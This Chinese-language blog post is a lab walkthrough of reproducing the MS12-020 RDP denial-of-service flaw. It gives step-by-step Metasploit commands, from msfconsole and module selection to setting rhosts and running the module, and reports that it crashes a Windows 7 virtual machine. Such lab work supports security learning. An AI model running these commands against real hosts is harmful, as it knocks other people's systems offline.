漏洞分析:MS12-020漏洞

漏洞分析:MS12-020漏洞

实验工具
1、VMware虚拟机
2、Kali 2021 系统虚拟机
3、Windows 7系统虚拟机

1、第一步:在VMware中打开Kali 2021虚拟机和Windows 7虚拟机,并确保两台机器能够互相【Ping】通,网络连接正常。
漏洞分析:MS12-020漏洞_第1张图片
2、确定能连通后,打开MSF攻击框架,Kali 2021【终端】中输入命令【msfconsole】。
漏洞分析:MS12-020漏洞_第2张图片
3、输入搜索命令,搜索MS12-020漏洞,输入命令【search ms12_020】。漏洞分析:MS12-020漏洞_第3张图片
4、引用编号为【1】的漏洞,引用漏洞路径,利用了rdp协议的一种漏洞,输入命令【use auxiliary/dos/windows/rdp/ms12_020_maxchannelids】,回车执行。
在这里插入图片描述
5、引用后,输入【show options】查看漏洞配置内容。
漏洞分析:MS12-020漏洞_第4张图片
6、可以看到,可配置的内容并不是很多,接下来配置【rhosts】即可,因为该漏洞利用rdp协议,使用了3389端口,所以【rport】不需要修改,输入命令,【set rhosts IP地址】,IP地址为Windows 7虚拟机的IP。
在这里插入图片描述
7、全部配置完毕,输入【run】运行,回到Windows 7发现虚拟机蓝屏,证明MS12_020漏洞攻击成功。
漏洞分析:MS12-020漏洞_第5张图片

博客园地址:https://www.cnblogs.com/redHskb/
知乎地址:https://www.zhihu.com/people/yi-kuai-xiao-bing-gan-43-64/posts
欢迎关注评论,耶斯莫拉

你可能感兴趣的:(漏洞复现,信息安全,网络安全,安全)